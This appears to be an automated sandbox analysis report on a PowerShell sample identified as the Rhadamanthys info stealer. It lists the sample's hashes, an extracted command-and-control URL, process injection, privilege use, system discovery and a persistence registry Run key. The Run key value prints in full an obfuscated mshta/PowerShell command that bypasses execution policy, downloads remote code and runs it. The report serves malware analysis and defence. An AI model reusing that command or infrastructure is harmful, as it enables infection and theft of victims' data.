Analysis
-
max time kernel
121s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
07/03/2025, 18:03
Static task
static1
Behavioral task
behavioral1
Sample
ddd.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ddd.ps1
Resource
win10v2004-20250217-en
General
-
Target
ddd.ps1
-
Size
2.4MB
-
MD5
5b322ca0eb9655beaf39e4453d141cd2
-
SHA1
b556cbaf50c2b77fd73d4386f068f0bbffe7504d
-
SHA256
b2082d4666cd9eb57896b04058438fad6a268e504d877b908ae276b3c68799fe
-
SHA512
0648609146167599498b41bdb97c02eb0947ba03e44ee63c3448bd6b2508b4bd7054a63671c12120b01240bba810489da68e3f79dc2a7674447ad760127dcc1b
-
SSDEEP
1536:P26vgn00oR/S7rdvtk76qu6p5LSTFPNWdD7uHzgjw8b560jSKkjptOVNjC5GGQli:bYf
Malware Config
Extracted
rhadamanthys
https://94.156.71.221:1485/ba9365b02ebb09b86/kscmx9w7.etux2
Signatures
-
Detects Rhadamanthys payload 1 IoCs
resource yara_rule behavioral2/memory/1520-37-0x0000000001100000-0x00000000011B2000-memory.dmp Rhadamanthys_v8 -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1520 created 2764 1520 RegSvcs.exe 47 PID 1312 created 2764 1312 RegSvcs.exe 47 -
Deletes itself 1 IoCs
pid Process 5060 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desdwnessr2 = "mshta \"javascript:nz=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm hotelmainrat2024.blogspot.com/hegegehe | iex);Start-Sleep -Seconds 5;','run']; uh=[nz[3],nz[0],nz[1],nz[2]]; new ActiveXObject(uh[2])[uh[0]](uh[3], 0, true);close();new ActiveXObject(uh[1]).DeleteFile(WScript.ScriptFullName);\"\r\n" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Defswadswner1 = "schtasks /run /tn Defswadswner1" powershell.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5060 set thread context of 1520 5060 powershell.exe 96 PID 5060 set thread context of 1312 5060 powershell.exe 97 PID 5060 set thread context of 2916 5060 powershell.exe 98 PID 5060 set thread context of 3088 5060 powershell.exe 99 PID 5060 set thread context of 3236 5060 powershell.exe 100 PID 5060 set thread context of 3700 5060 powershell.exe 101 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
pid Process 5060 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language openwith.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Msbuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 1520 RegSvcs.exe 1520 RegSvcs.exe 1312 RegSvcs.exe 1312 RegSvcs.exe 4524 openwith.exe 4524 openwith.exe 4524 openwith.exe 4524 openwith.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5060 powershell.exe Token: SeRestorePrivilege 4372 dw20.exe Token: SeBackupPrivilege 4372 dw20.exe Token: SeBackupPrivilege 4372 dw20.exe Token: SeBackupPrivilege 4012 dw20.exe Token: SeBackupPrivilege 2408 dw20.exe Token: SeBackupPrivilege 2408 dw20.exe Token: SeBackupPrivilege 4012 dw20.exe Token: SeBackupPrivilege 4372 dw20.exe Token: SeBackupPrivilege 4372 dw20.exe Token: SeBackupPrivilege 4016 dw20.exe Token: SeBackupPrivilege 4016 dw20.exe Token: SeIncreaseQuotaPrivilege 5060 powershell.exe Token: SeSecurityPrivilege 5060 powershell.exe Token: SeTakeOwnershipPrivilege 5060 powershell.exe Token: SeLoadDriverPrivilege 5060 powershell.exe Token: SeSystemProfilePrivilege 5060 powershell.exe Token: SeSystemtimePrivilege 5060 powershell.exe Token: SeProfSingleProcessPrivilege 5060 powershell.exe Token: SeIncBasePriorityPrivilege 5060 powershell.exe Token: SeCreatePagefilePrivilege 5060 powershell.exe Token: SeBackupPrivilege 5060 powershell.exe Token: SeRestorePrivilege 5060 powershell.exe Token: SeShutdownPrivilege 5060 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeSystemEnvironmentPrivilege 5060 powershell.exe Token: SeRemoteShutdownPrivilege 5060 powershell.exe Token: SeUndockPrivilege 5060 powershell.exe Token: SeManageVolumePrivilege 5060 powershell.exe Token: 33 5060 powershell.exe Token: 34 5060 powershell.exe Token: 35 5060 powershell.exe Token: 36 5060 powershell.exe Token: SeIncreaseQuotaPrivilege 5060 powershell.exe Token: SeSecurityPrivilege 5060 powershell.exe Token: SeTakeOwnershipPrivilege 5060 powershell.exe Token: SeLoadDriverPrivilege 5060 powershell.exe Token: SeSystemProfilePrivilege 5060 powershell.exe Token: SeSystemtimePrivilege 5060 powershell.exe Token: SeProfSingleProcessPrivilege 5060 powershell.exe Token: SeIncBasePriorityPrivilege 5060 powershell.exe Token: SeCreatePagefilePrivilege 5060 powershell.exe Token: SeBackupPrivilege 5060 powershell.exe Token: SeRestorePrivilege 5060 powershell.exe Token: SeShutdownPrivilege 5060 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeSystemEnvironmentPrivilege 5060 powershell.exe Token: SeRemoteShutdownPrivilege 5060 powershell.exe Token: SeUndockPrivilege 5060 powershell.exe Token: SeManageVolumePrivilege 5060 powershell.exe Token: 33 5060 powershell.exe Token: 34 5060 powershell.exe Token: 35 5060 powershell.exe Token: 36 5060 powershell.exe Token: SeIncreaseQuotaPrivilege 5060 powershell.exe Token: SeSecurityPrivilege 5060 powershell.exe Token: SeTakeOwnershipPrivilege 5060 powershell.exe Token: SeLoadDriverPrivilege 5060 powershell.exe Token: SeSystemProfilePrivilege 5060 powershell.exe Token: SeSystemtimePrivilege 5060 powershell.exe Token: SeProfSingleProcessPrivilege 5060 powershell.exe Token: SeIncBasePriorityPrivilege 5060 powershell.exe Token: SeCreatePagefilePrivilege 5060 powershell.exe Token: SeBackupPrivilege 5060 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1520 5060 powershell.exe 96 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 1312 5060 powershell.exe 97 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 2916 5060 powershell.exe 98 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3088 5060 powershell.exe 99 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3236 5060 powershell.exe 100 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 5060 wrote to memory of 3700 5060 powershell.exe 101 PID 2916 wrote to memory of 2408 2916 RegSvcs.exe 102 PID 2916 wrote to memory of 2408 2916 RegSvcs.exe 102 PID 2916 wrote to memory of 2408 2916 RegSvcs.exe 102 PID 3700 wrote to memory of 4012 3700 Msbuild.exe 103 PID 3700 wrote to memory of 4012 3700 Msbuild.exe 103 PID 3700 wrote to memory of 4012 3700 Msbuild.exe 103 PID 3236 wrote to memory of 4372 3236 Msbuild.exe 104 PID 3236 wrote to memory of 4372 3236 Msbuild.exe 104 PID 3236 wrote to memory of 4372 3236 Msbuild.exe 104 PID 3088 wrote to memory of 4016 3088 RegSvcs.exe 105 PID 3088 wrote to memory of 4016 3088 RegSvcs.exe 105 PID 3088 wrote to memory of 4016 3088 RegSvcs.exe 105 PID 1520 wrote to memory of 4524 1520 RegSvcs.exe 107 PID 1520 wrote to memory of 4524 1520 RegSvcs.exe 107 PID 1520 wrote to memory of 4524 1520 RegSvcs.exe 107 PID 1520 wrote to memory of 4524 1520 RegSvcs.exe 107
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2764
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4524
-
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ddd.ps11⤵
- Deletes itself
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1312
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7563⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7563⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7843⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7763⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5a8ce2b2a6d51359e3fa083b8a3a7a5b6
SHA1d1bcd08c169bf81bf1d8ee393b154d1a6cd147b5
SHA256fb7753fb7767b80ad295827d5365929f01a60e39523ad7752b564a397e3ea675
SHA512e3e1229dac4bf848626b47c3672d8c411557dfb26d28c26509b00433a4948439b96c73cb2930ffefb024aafe11eaab0cc122d9fbd23786b787c1f3e5b42963f4
-
Filesize
315B
MD5f1fca28ac1e609a12e5841cb73e952ab
SHA17a06e4143f96a201b87d9532190a33fd166a588d
SHA256c2bcaf768331a524e6c79bad2aa8f0052741a48f54b5eaba92fa6c0c81f5f60a
SHA5123b40490aaa91d4fc76de628ecf94d0dc180fecc48178c256e8c735ffdecf2613666021b450dc00273daae7c19c7bd54864be93f4b5575469c7dc7b8edfe54f84
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82